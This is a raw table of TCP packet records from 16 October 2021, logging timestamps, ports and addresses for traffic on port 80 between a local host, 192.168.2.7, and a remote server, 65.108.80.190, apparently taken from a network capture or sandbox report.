Oct 16, 2021 16:53:25.351738930 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351749897 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351763010 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351766109 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351780891 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351792097 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351794958 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351809978 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351818085 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351821899 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351834059 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351846933 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351851940 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351867914 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351875067 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351882935 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351898909 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351906061 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351913929 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351927996 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351928949 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351944923 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351959944 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351963997 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351975918 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351979017 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351994991 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.352010965 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.352015018 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.352026939 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.352039099 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.352041960 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.352056026 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.352066994 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.352071047 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.352083921 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.352086067 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.352104902 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.352117062 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.352122068 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.352137089 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.352149010 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.352153063 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.352168083 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.352174997 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.352181911 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.352196932 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.352201939 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.352211952 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.352231979 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.352237940 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.352251053 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.352253914 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.352268934 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.352284908 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.352317095 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.388511896 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.388601065 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.388626099 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.388643026 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.388648033 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.388669968 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.388670921 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.388674974 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.388690948 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.388700962 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.388717890 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.388742924 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.388763905 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.388782978 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.388787031 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.388793945 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.388797045 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.388799906 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.388808966 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.388813972 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.388829947 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.388844967 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.388850927 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.388874054 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.388906002 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.388933897 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.388936996 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.388956070 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.388978004 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.388978958 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.388982058 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.389029980 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.389034033 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.389036894 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.389102936 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.389126062 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.389146090 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.389168024 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.389192104 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.389199972 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.389204979 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.389210939 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.389211893 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.389233112 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.389254093 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.389271021 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.389275074 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.389292955 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.389430046 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.389534950 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.392868996 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.392890930 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.392909050 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.392926931 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.392930984 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.392945051 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.392959118 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.392968893 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.392988920 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.392992973 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.393007040 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.393013954 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.393026114 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.393039942 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.393064976 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.408813000 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.411175966 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.428133965 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.428246021 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.428256035 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.428309917 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.428317070 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.428358078 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.428361893 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.428384066 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.428409100 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.428426027 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.428498983 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.428535938 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.428553104 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.428572893 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.428600073 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.428606033 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.428630114 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.428654909 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.428657055 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.428678036 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.428692102 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.428698063 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.428714037 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.428735018 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.428751945 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.428788900 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.428806067 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.428824902 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.428832054 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.428863049 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.428873062 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.428898096 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.428911924 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.428934097 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.428944111 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.428971052 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.428982019 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429011106 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429018021 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429048061 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429059029 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429081917 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429094076 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429116011 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429124117 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429153919 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429164886 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429187059 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429198027 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429223061 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429233074 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429259062 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429269075 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429296970 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429301023 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429336071 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429347992 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429371119 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429380894 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429405928 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429418087 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429441929 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429466963 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429476976 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429486036 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429516077 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429526091 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429547071 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429550886 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429564953 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429589987 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429594994 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429625034 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429636002 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429661036 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429672956 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429697037 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429704905 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429733038 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429744005 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429768085 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429776907 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429802895 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429812908 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429840088 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429845095 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429878950 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429889917 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429914951 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429927111 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429949999 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.429960966 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.429980040 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430013895 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430042028 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430052996 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430058956 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430063009 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430071115 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430085897 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430104017 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430114985 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430140018 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430151939 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430170059 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430188894 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430202007 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430212975 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430233955 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430244923 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430264950 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430280924 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430294037 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430308104 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430324078 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430337906 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430354118 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430373907 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430392027 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430397034 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430424929 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430437088 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430455923 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430470943 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430489063 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430501938 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430520058 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430536032 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430551052 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430566072 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430582047 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430593967 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430615902 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430629969 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430653095 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430663109 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430684090 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430696964 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430715084 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430732012 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430744886 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430758953 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430774927 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430793047 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430804968 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430818081 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430835962 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430849075 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430866957 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430881023 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430906057 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430908918 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430937052 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430952072 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430967093 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.430980921 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.430996895 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431010962 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431027889 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431039095 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431056976 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431078911 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431087017 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431099892 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431135893 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431137085 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431173086 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431183100 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431209087 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431219101 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431240082 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431256056 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431271076 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431282043 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431299925 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431315899 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431332111 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431343079 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431361914 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431375980 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431391954 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431407928 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431423903 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431435108 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431459904 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431472063 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431494951 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431504965 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431525946 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431540966 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431556940 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431569099 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431587934 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431602955 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431617975 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431632996 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431648016 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431663036 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431679964 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431689024 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431744099 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431759119 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431773901 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431786060 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431802034 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431823969 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431843042 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.431855917 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431891918 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.431900978 CEST	49737	80	192.168.2.7	65.108.80.190
